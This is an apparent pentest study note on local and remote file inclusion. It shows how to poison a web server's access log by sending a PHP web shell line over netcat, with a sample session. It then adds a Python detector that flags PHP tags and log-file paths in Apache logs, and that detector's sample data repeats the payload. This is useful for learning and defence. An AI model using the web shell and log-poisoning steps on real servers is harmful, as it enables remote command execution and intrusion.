Local File Inclusion / Remote File Inclusion (LFI/RFI)

LFI

LFI means that we can include a local file. We can inject code into the server by contaminating its log files; when the log file is then loaded through the inclusion, our code is executed.

This can be done with netcat:

nc -nv <target_ip> 80

Once connected, send the PHP code:

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Expected output:

kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
HTTP/1.1 400 Bad Request
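
On the defender's side, a poisoned entry like the one above stands out in the access log, because a legitimate request line has no reason to contain a PHP open tag. The Python script below is an added example, not part of the original notes; it assumes Apache's combined log format, and the sample lines, the `file` parameter and the log-path heuristic are constructed for illustration. It goes slightly beyond the request line by also checking the Referer and User-Agent fields, which are written to the same log.

```python
import re
from urllib.parse import unquote

# Apache "combined" format (assumed):
# host ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)  # PHP open tag or short echo tag
LOG_PATH = re.compile(r"/var/log/|(?:access|error)[._]log", re.I)  # heuristic

# Constructed sample log lines; hosts, paths and the "file" parameter are made up.
SAMPLE_LOG = r"""
10.11.0.4 - - [12/Mar/2024:10:01:07 +0000] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.11.0.4 - - [12/Mar/2024:10:02:11 +0000] "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>" 400 981 "-" "-"
10.11.0.4 - - [12/Mar/2024:10:03:40 +0000] "GET /page.php?file=%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
10.11.0.9 - - [12/Mar/2024:10:05:02 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php phpinfo(); ?>"
""".strip().splitlines()


def decode(value):
    """Undo up to two layers of URL encoding before matching."""
    return unquote(unquote(value))


def scan(lines):
    """Return (line_number, host, findings) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if m is None:
            # A line that does not fit the format deserves a manual look.
            hits.append((number, None, ["unparsed"]))
            continue
        # PHP code in any logged, client-controlled field means the log is poisoned.
        findings = [f"php-tag-in-{field}"
                    for field in ("request", "referer", "agent")
                    if PHP_TAG.search(decode(m[field]))]
        # A request that names a log file suggests the log is being included.
        if LOG_PATH.search(decode(m["request"])):
            findings.append("log-path-in-request")
        if findings:
            hits.append((number, m["host"], findings))
    return hits


if __name__ == "__main__":
    for number, host, findings in scan(SAMPLE_LOG):
        print(f"line {number} from {host}: {', '.join(findings)}")
```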

RFI

RFI is basically the same as LFI, except that the file location comes from an external URL.